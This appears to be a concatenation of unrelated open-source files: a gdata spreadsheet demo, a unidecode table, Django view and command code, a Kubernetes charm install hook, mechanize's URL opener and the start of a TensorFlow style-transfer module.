      self._ListUpdateAction(parsed[0], parsed[1])
    elif command[0] == 'delete':
      self._ListDeleteAction(command[1])
    else:
      self._InvalidCommandError(input)

  def _CellsGetAction(self):
    # Get the feed of cells
    feed = self.gd_client.GetCellsFeed(self.curr_key, self.curr_wksht_id)
    self._PrintFeed(feed)

  def _CellsUpdateAction(self, row, col, inputValue):
    # Write a single cell; the service echoes the updated entry back.
    entry = self.gd_client.UpdateCell(row=row, col=col, inputValue=inputValue,
        key=self.curr_key, wksht_id=self.curr_wksht_id)
    if isinstance(entry, gdata.spreadsheet.SpreadsheetsCell):
      print 'Updated!'

  def _ListGetAction(self):
    # Get the list feed
    self.list_feed = self.gd_client.GetListFeed(self.curr_key, self.curr_wksht_id)
    self._PrintFeed(self.list_feed)

  def _ListInsertAction(self, row_data):
    # row_data is "label=content ..." pairs; see _StringToDictionary.
    entry = self.gd_client.InsertRow(self._StringToDictionary(row_data),
        self.curr_key, self.curr_wksht_id)
    if isinstance(entry, gdata.spreadsheet.SpreadsheetsList):
      print 'Inserted!'

  def _ListUpdateAction(self, index, row_data):
    # Re-fetch the feed first so the entry's edit link is current.
    self.list_feed = self.gd_client.GetListFeed(self.curr_key, self.curr_wksht_id)
    entry = self.gd_client.UpdateRow(
        self.list_feed.entry[string.atoi(index)],
        self._StringToDictionary(row_data))
    if isinstance(entry, gdata.spreadsheet.SpreadsheetsList):
      print 'Updated!'

  def _ListDeleteAction(self, index):
    # Re-fetch the feed first so the entry's edit link is current.
    self.list_feed = self.gd_client.GetListFeed(self.curr_key, self.curr_wksht_id)
    self.gd_client.DeleteRow(self.list_feed.entry[string.atoi(index)])
    print 'Deleted!'

  def _StringToDictionary(self, row_data):
    # Turn "a=1 b=2" into {'a': '1', 'b': '2'}.
    dict = {}
    for param in row_data.split():
      temp = param.split('=')
      dict[temp[0]] = temp[1]
    return dict

  def _PrintFeed(self, feed):
    # Render any of the three feed types (cells, list, spreadsheet/worksheet).
    for i, entry in enumerate(feed.entry):
      if isinstance(feed, gdata.spreadsheet.SpreadsheetsCellsFeed):
        print '%s %s\n' % (entry.title.text, entry.content.text)
      elif isinstance(feed, gdata.spreadsheet.SpreadsheetsListFeed):
        print '%s %s %s' % (i, entry.title.text, entry.content.text)
        # Print this row's value for each column (the custom dictionary is
        # built using the gsx: elements in the entry.)
        print 'Contents:'
        for key in entry.custom:
          print '  %s: %s' % (key, entry.custom[key].text)
        print '\n',
      else:
        print '%s %s\n' % (i, entry.title.text)

  def _InvalidCommandError(self, input):
    print 'Invalid input: %s\n' % (input)

  def Run(self):
    """Main interactive loop: pick a spreadsheet/worksheet, then REPL forever."""
    self._PromptForSpreadsheet()
    self._PromptForWorksheet()
    input = raw_input('cells or list? ')
    # NOTE(review): these loops never terminate except via Ctrl-C/EOF.
    if input == 'cells':
      while True:
        self._PromptForCellsAction()
    elif input == 'list':
      while True:
        self._PromptForListAction()
def main():
  """Parse --user/--pw from argv and start the interactive demo."""
  # parse command line options
  try:
    opts, args = getopt.getopt(sys.argv[1:], "", ["user=", "pw="])
  except getopt.error, msg:
    print 'python spreadsheetExample.py --user [username] --pw [password] '
    sys.exit(2)
  user = ''
  pw = ''
  key = ''
  # Process options
  for o, a in opts:
    if o == "--user":
      user = a
    elif o == "--pw":
      pw = a
  if user == '' or pw == '':
    # Both credentials are required; print usage and bail out.
    print 'python spreadsheetExample.py --user [username] --pw [password] '
    sys.exit(2)
  sample = SimpleCRUD(user, pw)
  sample.Run()


if __name__ == '__main__':
  main()
Mhynlo/SickRage | lib/unidecode/x08e.py | 252 | 4659 | data = (
'Chu ', # 0x00
'Jing ', # 0x01
'Nie ', # 0x02
'Xiao ', # 0x03
'Bo ', # 0x04
'Chi ', # 0x05
'Qun ', # 0x06
'Mou ', # 0x07
'Shu ', # 0x08
'Lang ', # 0x09
'Yong ', # 0x0a
'Jiao ', # 0x0b
'Chou ', # 0x0c
'Qiao ', # 0x0d
'[?] ', # 0x0e
'Ta ', # 0x0f
'Jian ', # 0x10
'Qi ', # 0x11
'Wo ', # 0x12
'Wei ', # 0x13
'Zhuo ', # 0x14
'Jie ', # 0x15
'Ji ', # 0x16
'Nie ', # 0x17
'Ju ', # 0x18
'Ju ', # 0x19
'Lun ', # 0x1a
'Lu ', # 0x1b
'Leng ', # 0x1c
'Huai ', # 0x1d
'Ju ', # 0x1e
'Chi ', # 0x1f
'Wan ', # 0x20
'Quan ', # 0x21
'Ti ', # 0x22
'Bo ', # 0x23
'Zu ', # 0x24
'Qie ', # 0x25
'Ji ', # 0x26
'Cu ', # 0x27
'Zong ', # 0x28
'Cai ', # 0x29
'Zong ', # 0x2a
'Peng ', # 0x2b
'Zhi ', # 0x2c
'Zheng ', # 0x2d
'Dian ', # 0x2e
'Zhi ', # 0x2f
'Yu ', # 0x30
'Duo ', # 0x31
'Dun ', # 0x32
'Chun ', # 0x33
'Yong ', # 0x34
'Zhong ', # 0x35
'Di ', # 0x36
'Zhe ', # 0x37
'Chen ', # 0x38
'Chuai ', # 0x39
'Jian ', # 0x3a
'Gua ', # 0x3b
'Tang ', # 0x3c
'Ju ', # 0x3d
'Fu ', # 0x3e
'Zu ', # 0x3f
'Die ', # 0x40
'Pian ', # 0x41
'Rou ', # 0x42
'Nuo ', # 0x43
'Ti ', # 0x44
'Cha ', # 0x45
'Tui ', # 0x46
'Jian ', # 0x47
'Dao ', # 0x48
'Cuo ', # 0x49
'Xi ', # 0x4a
'Ta ', # 0x4b
'Qiang ', # 0x4c
'Zhan ', # 0x4d
'Dian ', # 0x4e
'Ti ', # 0x4f
'Ji ', # 0x50
'Nie ', # 0x51
'Man ', # 0x52
'Liu ', # 0x53
'Zhan ', # 0x54
'Bi ', # 0x55
'Chong ', # 0x56
'Lu ', # 0x57
'Liao ', # 0x58
'Cu ', # 0x59
'Tang ', # 0x5a
'Dai ', # 0x5b
'Suo ', # 0x5c
'Xi ', # 0x5d
'Kui ', # 0x5e
'Ji ', # 0x5f
'Zhi ', # 0x60
'Qiang ', # 0x61
'Di ', # 0x62
'Man ', # 0x63
'Zong ', # 0x64
'Lian ', # 0x65
'Beng ', # 0x66
'Zao ', # 0x67
'Nian ', # 0x68
'Bie ', # 0x69
'Tui ', # 0x6a
'Ju ', # 0x6b
'Deng ', # 0x6c
'Ceng ', # 0x6d
'Xian ', # 0x6e
'Fan ', # 0x6f
'Chu ', # 0x70
'Zhong ', # 0x71
'Dun ', # 0x72
'Bo ', # 0x73
'Cu ', # 0x74
'Zu ', # 0x75
'Jue ', # 0x76
'Jue ', # 0x77
'Lin ', # 0x78
'Ta ', # 0x79
'Qiao ', # 0x7a
'Qiao ', # 0x7b
'Pu ', # 0x7c
'Liao ', # 0x7d
'Dun ', # 0x7e
'Cuan ', # 0x7f
'Kuang ', # 0x80
'Zao ', # 0x81
'Ta ', # 0x82
'Bi ', # 0x83
'Bi ', # 0x84
'Zhu ', # 0x85
'Ju ', # 0x86
'Chu ', # 0x87
'Qiao ', # 0x88
'Dun ', # 0x89
'Chou ', # 0x8a
'Ji ', # 0x8b
'Wu ', # 0x8c
'Yue ', # 0x8d
'Nian ', # 0x8e
'Lin ', # 0x8f
'Lie ', # 0x90
'Zhi ', # 0x91
'Li ', # 0x92
'Zhi ', # 0x93
'Chan ', # 0x94
'Chu ', # 0x95
'Duan ', # 0x96
'Wei ', # 0x97
'Long ', # 0x98
'Lin ', # 0x99
'Xian ', # 0x9a
'Wei ', # 0x9b
'Zuan ', # 0x9c
'Lan ', # 0x9d
'Xie ', # 0x9e
'Rang ', # 0x9f
'Xie ', # 0xa0
'Nie ', # 0xa1
'Ta ', # 0xa2
'Qu ', # 0xa3
'Jie ', # 0xa4
'Cuan ', # 0xa5
'Zuan ', # 0xa6
'Xi ', # 0xa7
'Kui ', # 0xa8
'Jue ', # 0xa9
'Lin ', # 0xaa
'Shen ', # 0xab
'Gong ', # 0xac
'Dan ', # 0xad
'Segare ', # 0xae
'Qu ', # 0xaf
'Ti ', # 0xb0
'Duo ', # 0xb1
'Duo ', # 0xb2
'Gong ', # 0xb3
'Lang ', # 0xb4
'Nerau ', # 0xb5
'Luo ', # 0xb6
'Ai ', # 0xb7
'Ji ', # 0xb8
'Ju ', # 0xb9
'Tang ', # 0xba
'Utsuke ', # 0xbb
'[?] ', # 0xbc
'Yan ', # 0xbd
'Shitsuke ', # 0xbe
'Kang ', # 0xbf
'Qu ', # 0xc0
'Lou ', # 0xc1
'Lao ', # 0xc2
'Tuo ', # 0xc3
'Zhi ', # 0xc4
'Yagate ', # 0xc5
'Ti ', # 0xc6
'Dao ', # 0xc7
'Yagate ', # 0xc8
'Yu ', # 0xc9
'Che ', # 0xca
'Ya ', # 0xcb
'Gui ', # 0xcc
'Jun ', # 0xcd
'Wei ', # 0xce
'Yue ', # 0xcf
'Xin ', # 0xd0
'Di ', # 0xd1
'Xuan ', # 0xd2
'Fan ', # 0xd3
'Ren ', # 0xd4
'Shan ', # 0xd5
'Qiang ', # 0xd6
'Shu ', # 0xd7
'Tun ', # 0xd8
'Chen ', # 0xd9
'Dai ', # 0xda
'E ', # 0xdb
'Na ', # 0xdc
'Qi ', # 0xdd
'Mao ', # 0xde
'Ruan ', # 0xdf
'Ren ', # 0xe0
'Fan ', # 0xe1
'Zhuan ', # 0xe2
'Hong ', # 0xe3
'Hu ', # 0xe4
'Qu ', # 0xe5
'Huang ', # 0xe6
'Di ', # 0xe7
'Ling ', # 0xe8
'Dai ', # 0xe9
'Ao ', # 0xea
'Zhen ', # 0xeb
'Fan ', # 0xec
'Kuang ', # 0xed
'Ang ', # 0xee
'Peng ', # 0xef
'Bei ', # 0xf0
'Gu ', # 0xf1
'Ku ', # 0xf2
'Pao ', # 0xf3
'Zhu ', # 0xf4
'Rong ', # 0xf5
'E ', # 0xf6
'Ba ', # 0xf7
'Zhou ', # 0xf8
'Zhi ', # 0xf9
'Yao ', # 0xfa
'Ke ', # 0xfb
'Yi ', # 0xfc
'Qing ', # 0xfd
'Shi ', # 0xfe
'Ping ', # 0xff
)
| gpl-3.0 |
DanaOshri/Open-Knesset | video/management/commands/add_video.py | 14 | 1246 | # encoding: utf-8
from django.core.management.base import NoArgsCommand
from optparse import make_option
from video.management.commands.sub_commands.AddVideo import AddVideo
class Command(NoArgsCommand):
    # Management command that registers a video link and relates it to a
    # model object; the actual work is delegated to AddVideo.
    option_list = NoArgsCommand.option_list + (
        make_option('--video-link',action='store',dest='video-link',
            help="link to the video, use --list-types to see a list of supported link types"),
        make_option('--list-types',action='store_true',dest='list-types',
            help="list supported video link types and formats"),
        make_option('--object-type',action='store',dest='object-type',
            help="set the object type, currently only member is supported"),
        make_option('--object-id',action='store',dest='object-id',
            help="set the object id that the video will be related to"),
        make_option('--sticky',action='store_true',dest='is_sticky',
            help="set the video as sticky"),
    )

    def handle_noargs(self, **options):
        # --list-types short-circuits: only print the supported formats.
        if options.get('list-types',False):
            print """Supported link formats:
youtube - http://www.youtube.com/watch?v=2sASREICzqY"""
        else:
            # Delegate to AddVideo and echo its answer string.
            av=AddVideo(options)
            av.run()
            print av.ans
| bsd-3-clause |
sseago/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/install.py | 105 | 3183 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# setup.pre_install() must run before the charmhelpers imports below: it
# bootstraps the dependencies those imports rely on (order is significant,
# which is why this call sits between import statements).
import setup
setup.pre_install()

import subprocess

from charmhelpers.core import hookenv
from charmhelpers import fetch
from charmhelpers.fetch import archiveurl
from path import path
def install():
    """Charm install hook: packages, Go toolchain, env vars, k8s checkout."""
    install_packages()
    hookenv.log('Installing go')
    download_go()
    hookenv.log('Adding kubernetes and go to the path')
    # Shell exports appended to the ubuntu and root bashrc files.
    env_exports = [
        'export GOROOT=/usr/local/go\n',
        'export PATH=$PATH:$GOROOT/bin\n',
        'export KUBE_MASTER_IP=0.0.0.0\n',
        'export KUBERNETES_MASTER=http://$KUBE_MASTER_IP\n',
    ]
    update_rc_files(env_exports)
    hookenv.log('Downloading kubernetes code')
    clone_repository()
    # Expose the API endpoint.
    hookenv.open_port(8080)
    hookenv.log('Install complete')
def download_go():
    """
    Kubernetes charm strives to support upstream. Part of this is installing a
    fairly recent edition of GO. This fetches the golang archive (verifying
    its sha1) and installs it in /usr/local.
    """
    url = 'https://storage.googleapis.com/golang/go1.4.2.linux-amd64.tar.gz'
    checksum = '5020af94b52b65cc9b6f11d50a67e4bae07b0aff'
    archiveurl.ArchiveUrlFetchHandler().install(url, '/usr/local', checksum, 'sha1')
def clone_repository():
    """
    Clone the upstream repository into /opt/kubernetes for deployment compilation
    of kubernetes. Subsequently used during upgrades.
    """
    repository = 'https://github.com/GoogleCloudPlatform/kubernetes.git'
    kubernetes_directory = '/opt/kubernetes'
    command = ['git', 'clone', repository, kubernetes_directory]
    print(command)
    # check_output raises CalledProcessError if the clone fails.
    print(subprocess.check_output(command))
def install_packages():
    """
    Install required packages to build the k8s source, and syndicate between
    minion nodes. In addition, fetch pip to handle python dependencies.
    """
    hookenv.log('Installing Debian packages')
    required = ['build-essential', 'git', 'make', 'nginx', 'python-pip']
    # Only install what is not already present.
    fetch.apt_install(fetch.filter_installed_packages(required))
def update_rc_files(strings):
    """
    Preseed the bash environment for ubuntu and root with K8's env vars to
    make interfacing with the api easier. (see: kubectrl docs)

    Each string in *strings* is appended to the rc file only if it is not
    already present.
    """
    for rc_file in (path('/home/ubuntu/.bashrc'), path('/root/.bashrc')):
        lines = rc_file.lines()
        lines.extend(s for s in strings if s not in lines)
        rc_file.write_lines(lines)

if __name__ == "__main__":
    install()
| apache-2.0 |
ppizarror/Hero-of-Antair | bin/mechanize/_opener.py | 3 | 14766 | """URL opener.
Copyright 2004-2006 John J Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import os, urllib2, bisect, httplib, types, tempfile
from _request import Request
import _response
import _rfc3986
import _sockettimeout
import _urllib2_fork
from _util import isstringlike
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
set
except NameError:
import sets
set = sets.Set
# Keep a handle on the builtin open() so OpenerDirector.retrieve() can use it
# as a default even though "open" is shadowed by method/parameter names.
open_file = open


class ContentTooShortError(urllib2.URLError):
    # Raised by OpenerDirector.retrieve() when fewer bytes than the
    # Content-Length header promised were read; .result holds the
    # (filename, headers) pair that would otherwise have been returned.
    def __init__(self, reason, result):
        urllib2.URLError.__init__(self, reason)
        self.result = result
def set_request_attr(req, name, value, default):
    """Ensure *req* carries attribute *name*.

    A missing attribute is first filled with *default*; a *value* that is
    not (identically) the default then overrides whatever is there.
    """
    missing = False
    try:
        getattr(req, name)
    except AttributeError:
        missing = True
    if missing:
        setattr(req, name, default)
    if value is not default:
        setattr(req, name, value)
class OpenerDirector(_urllib2_fork.OpenerDirector):
    """urllib2-style opener that additionally supports mechanize's
    any_request/any_response hooks, per-scheme request/response processors
    and a retrieve() method with temp-file bookkeeping (cleaned up by
    close())."""
    def __init__(self):
        _urllib2_fork.OpenerDirector.__init__(self)
        # really none of these are (sanely) public -- the lack of initial
        # underscore on some is just due to following urllib2
        self.process_response = {}
        self.process_request = {}
        self._any_request = {}
        self._any_response = {}
        self._handler_index_valid = True
        self._tempfiles = []
    def add_handler(self, handler):
        if not hasattr(handler, "add_parent"):
            raise TypeError("expected BaseHandler instance, got %r" %
                            type(handler))
        if handler in self.handlers:
            return
        # XXX why does self.handlers need to be sorted?
        bisect.insort(self.handlers, handler)
        handler.add_parent(self)
        # Force a re-index on the next open().
        self._handler_index_valid = False
    def _maybe_reindex_handlers(self):
        # Rebuild the scheme -> handler lookup tables from handler method
        # names (e.g. "http_open", "http_error_302", "https_request"),
        # dropping handlers that expose none of the recognised methods.
        if self._handler_index_valid:
            return
        handle_error = {}
        handle_open = {}
        process_request = {}
        process_response = {}
        any_request = set()
        any_response = set()
        unwanted = []
        for handler in self.handlers:
            added = False
            for meth in dir(handler):
                if meth in ["redirect_request", "do_open", "proxy_open"]:
                    # oops, coincidental match
                    continue
                if meth == "any_request":
                    any_request.add(handler)
                    added = True
                    continue
                elif meth == "any_response":
                    any_response.add(handler)
                    added = True
                    continue
                # Method names encode "<scheme>_<condition>[_<kind>]".
                ii = meth.find("_")
                scheme = meth[:ii]
                condition = meth[ii+1:]
                if condition.startswith("error"):
                    jj = meth[ii+1:].find("_") + ii + 1
                    kind = meth[jj+1:]
                    try:
                        # Numeric kinds are HTTP status codes.
                        kind = int(kind)
                    except ValueError:
                        pass
                    lookup = handle_error.setdefault(scheme, {})
                elif condition == "open":
                    kind = scheme
                    lookup = handle_open
                elif condition == "request":
                    kind = scheme
                    lookup = process_request
                elif condition == "response":
                    kind = scheme
                    lookup = process_response
                else:
                    continue
                lookup.setdefault(kind, set()).add(handler)
                added = True
            if not added:
                unwanted.append(handler)
        for handler in unwanted:
            self.handlers.remove(handler)
        # sort indexed methods
        # XXX could be cleaned up
        for lookup in [process_request, process_response]:
            for scheme, handlers in lookup.iteritems():
                lookup[scheme] = handlers
        for scheme, lookup in handle_error.iteritems():
            for code, handlers in lookup.iteritems():
                handlers = list(handlers)
                handlers.sort()
                lookup[code] = handlers
        for scheme, handlers in handle_open.iteritems():
            handlers = list(handlers)
            handlers.sort()
            handle_open[scheme] = handlers
        # cache the indexes
        self.handle_error = handle_error
        self.handle_open = handle_open
        self.process_request = process_request
        self.process_response = process_response
        self._any_request = any_request
        self._any_response = any_response
    def _request(self, url_or_req, data, visit,
                 timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
        # Normalise a URL string or Request instance into a Request carrying
        # .visit and .timeout attributes.
        if isstringlike(url_or_req):
            req = Request(url_or_req, data, visit=visit, timeout=timeout)
        else:
            # already a mechanize.Request instance
            req = url_or_req
            if data is not None:
                req.add_data(data)
            # XXX yuck
            set_request_attr(req, "visit", visit, None)
            set_request_attr(req, "timeout", timeout,
                             _sockettimeout._GLOBAL_DEFAULT_TIMEOUT)
        return req
    def open(self, fullurl, data=None,
             timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
        req = self._request(fullurl, data, None, timeout)
        req_scheme = req.get_type()
        self._maybe_reindex_handlers()
        # pre-process request
        # XXX should we allow a Processor to change the URL scheme
        #   of the request?
        request_processors = set(self.process_request.get(req_scheme, []))
        request_processors.update(self._any_request)
        request_processors = list(request_processors)
        request_processors.sort()
        for processor in request_processors:
            for meth_name in ["any_request", req_scheme+"_request"]:
                meth = getattr(processor, meth_name, None)
                if meth:
                    req = meth(req)
        # In Python >= 2.4, .open() supports processors already, so we must
        # call ._open() instead.
        urlopen = _urllib2_fork.OpenerDirector._open
        response = urlopen(self, req, data)
        # post-process response
        response_processors = set(self.process_response.get(req_scheme, []))
        response_processors.update(self._any_response)
        response_processors = list(response_processors)
        response_processors.sort()
        for processor in response_processors:
            for meth_name in ["any_response", req_scheme+"_response"]:
                meth = getattr(processor, meth_name, None)
                if meth:
                    response = meth(req, response)
        return response
    def error(self, proto, *args):
        # Dispatch protocol errors through the handler chain; HTTP errors are
        # further dispatched by status code, falling back to
        # http_error_default.
        if proto in ['http', 'https']:
            # XXX http[s] protocols are special-cased
            dict = self.handle_error['http'] # https is not different than http
            proto = args[2]  # YUCK!
            meth_name = 'http_error_%s' % proto
            http_err = 1
            orig_args = args
        else:
            dict = self.handle_error
            meth_name = proto + '_error'
            http_err = 0
        args = (dict, proto, meth_name) + args
        result = apply(self._call_chain, args)
        if result:
            return result
        if http_err:
            args = (dict, 'default', 'http_error_default') + orig_args
            return apply(self._call_chain, args)
    # Chunk size used by retrieve() when copying the response body.
    BLOCK_SIZE = 1024*8
    def retrieve(self, fullurl, filename=None, reporthook=None, data=None,
                 timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT,
                 open=open_file):
        """Returns (filename, headers).

        For remote objects, the default filename will refer to a temporary
        file.  Temporary files are removed when the OpenerDirector.close()
        method is called.

        For file: URLs, at present the returned filename is None.  This may
        change in future.

        If the actual number of bytes read is less than indicated by the
        Content-Length header, raises ContentTooShortError (a URLError
        subclass).  The exception's .result attribute contains the (filename,
        headers) that would have been returned.
        """
        req = self._request(fullurl, data, False, timeout)
        scheme = req.get_type()
        fp = self.open(req)
        try:
            headers = fp.info()
            if filename is None and scheme == 'file':
                # XXX req.get_selector() seems broken here, return None,
                #   pending sanity :-/
                return None, headers
                #return urllib.url2pathname(req.get_selector()), headers
            if filename:
                tfp = open(filename, 'wb')
            else:
                # No filename given: write to a temp file (removed by close()).
                path = _rfc3986.urlsplit(req.get_full_url())[2]
                suffix = os.path.splitext(path)[1]
                fd, filename = tempfile.mkstemp(suffix)
                self._tempfiles.append(filename)
                tfp = os.fdopen(fd, 'wb')
            try:
                result = filename, headers
                bs = self.BLOCK_SIZE
                size = -1
                read = 0
                blocknum = 0
                if reporthook:
                    if "content-length" in headers:
                        size = int(headers["Content-Length"])
                    reporthook(blocknum, bs, size)
                while 1:
                    block = fp.read(bs)
                    if block == "":
                        break
                    read += len(block)
                    tfp.write(block)
                    blocknum += 1
                    if reporthook:
                        reporthook(blocknum, bs, size)
            finally:
                tfp.close()
        finally:
            fp.close()
        # raise exception if actual size does not match content-length header
        if size >= 0 and read < size:
            raise ContentTooShortError(
                "retrieval incomplete: "
                "got only %i out of %i bytes" % (read, size),
                result
            )
        return result
    def close(self):
        _urllib2_fork.OpenerDirector.close(self)
        # make it very obvious this object is no longer supposed to be used
        self.open = self.error = self.retrieve = self.add_handler = None
        # Best-effort removal of temp files created by retrieve().
        if self._tempfiles:
            for filename in self._tempfiles:
                try:
                    os.unlink(filename)
                except OSError:
                    pass
            del self._tempfiles[:]
def wrapped_open(urlopen, process_response_object, fullurl, data=None,
                 timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
    # Call *urlopen* and funnel both success and HTTPError responses (an
    # HTTPError with a non-None .fp doubles as a response object) through
    # *process_response_object*; processed error responses are re-raised so
    # callers still observe the failure.
    success = True
    try:
        response = urlopen(fullurl, data, timeout)
    except urllib2.HTTPError, error:
        success = False
        if error.fp is None:  # not a response
            raise
        response = error
    if response is not None:
        response = process_response_object(response)
    if not success:
        raise response
    return response
class ResponseProcessingOpener(OpenerDirector):
    # OpenerDirector whose open() routes every response -- including HTTP
    # error responses -- through self.process_response_object().

    def open(self, fullurl, data=None,
             timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
        def bound_open(fullurl, data=None,
                       timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
            return OpenerDirector.open(self, fullurl, data, timeout)
        return wrapped_open(
            bound_open, self.process_response_object, fullurl, data, timeout)

    def process_response_object(self, response):
        # Identity hook; subclasses override to transform responses.
        return response
class SeekableResponseOpener(ResponseProcessingOpener):
    def process_response_object(self, response):
        # Wrap every response via _response.seek_wrapped_response
        # (presumably making the response body seekable -- name-based;
        # verify against the _response module).
        return _response.seek_wrapped_response(response)
def isclass(obj):
    """Return True if *obj* is a class, old-style or new-style."""
    class_types = (types.ClassType, type)
    return isinstance(obj, class_types)
class OpenerFactory:
    """This class's interface is quite likely to change."""

    default_classes = [
        # handlers
        _urllib2_fork.ProxyHandler,
        _urllib2_fork.UnknownHandler,
        _urllib2_fork.HTTPHandler,
        _urllib2_fork.HTTPDefaultErrorHandler,
        _urllib2_fork.HTTPRedirectHandler,
        _urllib2_fork.FTPHandler,
        _urllib2_fork.FileHandler,
        # processors
        _urllib2_fork.HTTPCookieProcessor,
        _urllib2_fork.HTTPErrorProcessor,
    ]
    if hasattr(httplib, 'HTTPS'):
        default_classes.append(_urllib2_fork.HTTPSHandler)
    handlers = []
    replacement_handlers = []

    def __init__(self, klass=OpenerDirector):
        # klass: the opener class to instantiate in build_opener().
        self.klass = klass

    def build_opener(self, *handlers):
        """Create an opener object from a list of handlers and processors.

        The opener will use several default handlers and processors, including
        support for HTTP and FTP.

        If any of the handlers passed as arguments are subclasses of the
        default handlers, the default handlers will not be used.
        """
        opener = self.klass()
        remaining = list(self.default_classes)
        # A user-supplied handler (class or instance) supersedes any
        # default class it derives from.
        superseded = set()
        for default in remaining:
            for supplied in handlers:
                if isclass(supplied):
                    if issubclass(supplied, default):
                        superseded.add(default)
                elif isinstance(supplied, default):
                    superseded.add(default)
        for default in superseded:
            remaining.remove(default)
        for default in remaining:
            opener.add_handler(default())
        # Add the user-supplied handlers last, instantiating bare classes.
        for supplied in handlers:
            opener.add_handler(supplied() if isclass(supplied) else supplied)
        return opener
# Module-level convenience: a default factory-bound build_opener ...
build_opener = OpenerFactory().build_opener
# ... plus the lazily-built shared opener and the lock that guards its
# construction in urlopen()/urlretrieve() below.
_opener = None
urlopen_lock = _threading.Lock()
def urlopen(url, data=None, timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
    """Open *url* using the shared module-level opener, creating it lazily."""
    global _opener
    if _opener is None:
        with urlopen_lock:
            # Double-checked locking: another thread may have built the
            # opener while we waited for the lock.
            if _opener is None:
                _opener = build_opener()
    return _opener.open(url, data, timeout)
def urlretrieve(url, filename=None, reporthook=None, data=None,
                timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
    """Retrieve *url* using the shared module-level opener, creating it lazily."""
    global _opener
    if _opener is None:
        with urlopen_lock:
            # Re-check under the lock in case another thread won the race.
            if _opener is None:
                _opener = build_opener()
    return _opener.retrieve(url, filename, reporthook, data, timeout)
def install_opener(opener):
    """Install *opener* as the module-global opener used by urlopen()/urlretrieve()."""
    global _opener
    _opener = opener
| gpl-2.0 |
aisipos/django | tests/view_tests/generic_urls.py | 329 | 1356 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.views.generic import RedirectView
from . import views
from .models import Article, DateArticle
# Keyword-argument dictionaries handed to generic views in the tests below.
date_based_info_dict = {
    'queryset': Article.objects.all(),
    'date_field': 'date_created',
    'month_format': '%m',
}
object_list_dict = {
    'queryset': Article.objects.all(),
    'paginate_by': 2,
}
object_list_no_paginate_by = {
    'queryset': Article.objects.all(),
}
# Variants of the date-based config: numeric day format, and the same
# options applied to the DateArticle queryset.
numeric_days_info_dict = dict(date_based_info_dict, day_format='%d')
date_based_datefield_info_dict = dict(date_based_info_dict, queryset=DateArticle.objects.all())
urlpatterns = [
    url(r'^accounts/login/$', auth_views.login, {'template_name': 'login.html'}),
    url(r'^accounts/logout/$', auth_views.logout),
    # Special URLs for particular regression cases.
    url('^中文/target/$', views.index_page),
]
# redirects, both temporary and permanent, with non-ASCII targets
urlpatterns += [
    url('^nonascii_redirect/$', RedirectView.as_view(
        url='/中文/target/', permanent=False)),
    url('^permanent_nonascii_redirect/$', RedirectView.as_view(
        url='/中文/target/', permanent=True)),
]
# json response
urlpatterns += [
    url(r'^json/response/$', views.json_response_view),
]
| bsd-3-clause |
dariox2/CADL | session-5/libs/stylenet.py | 4 | 11350 | """Style Net w/ tests for Video Style Net.
Video Style Net requires OpenCV 3.0.0+ w/ Contrib for Python to be installed.
Creative Applications of Deep Learning w/ Tensorflow.
Kadenze, Inc.
Copyright Parag K. Mital, June 2016.
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
from . import vgg16
from . import gif
def make_4d(img):
    """Promote *img* to a 4-dimensional N x H x W x C array.

    A 2-D ``H x W`` image becomes ``1 x H x W x 1``, a 3-D ``H x W x C``
    image becomes ``1 x H x W x C`` and a 4-D image is returned unchanged.

    Parameters
    ----------
    img : np.ndarray
        Given image as H x W x C or H x W.

    Returns
    -------
    img : np.ndarray
        N x H x W x C image.

    Raises
    ------
    ValueError
        Unexpected number of dimensions.
    """
    ndim = img.ndim
    if ndim == 4:
        return img
    if ndim == 3:
        return img[np.newaxis]
    if ndim == 2:
        return img[np.newaxis, ..., np.newaxis]
    raise ValueError('Incorrect dimensions for image!')
def stylize(content_img, style_img, base_img=None, saveto=None, gif_step=5,
            n_iterations=100, style_weight=1.0, content_weight=1.0):
    """Stylization w/ the given content and style images.
    Follows the approach in Leon Gatys et al.
    Parameters
    ----------
    content_img : np.ndarray
        Image to use for finding the content features.
    style_img : np.ndarray
        Image to use for finding the style features.
    base_img : None, optional
        Image to use for the base content. Can be noise or an existing image.
        If None, the content image will be used.
    saveto : str, optional
        Name of GIF image to write to, e.g. "stylization.gif"
    gif_step : int, optional
        Modulo of iterations to save the current stylization.
    n_iterations : int, optional
        Number of iterations to run for.
    style_weight : float, optional
        Weighting on the style features.
    content_weight : float, optional
        Weighting on the content features.
    Returns
    -------
    stylization : np.ndarray
        Final iteration of the stylization.
    """
    # Preprocess both content and style images
    content_img = make_4d(content_img)
    style_img = make_4d(style_img)
    if base_img is None:
        base_img = content_img
    else:
        base_img = make_4d(base_img)
    # Get Content and Style features
    # Pass 1: run the pretrained VGG once to record the fixed targets.  The
    # dropout placeholders are fed ones so inference is deterministic.
    net = vgg16.get_vgg_model()
    g = tf.Graph()
    with tf.Session(graph=g) as sess:
        tf.import_graph_def(net['graph_def'], name='vgg')
        names = [op.name for op in g.get_operations()]
        x = g.get_tensor_by_name(names[0] + ':0')
        content_layer = 'vgg/conv3_2/conv3_2:0'
        content_features = g.get_tensor_by_name(
            content_layer).eval(feed_dict={
                x: content_img,
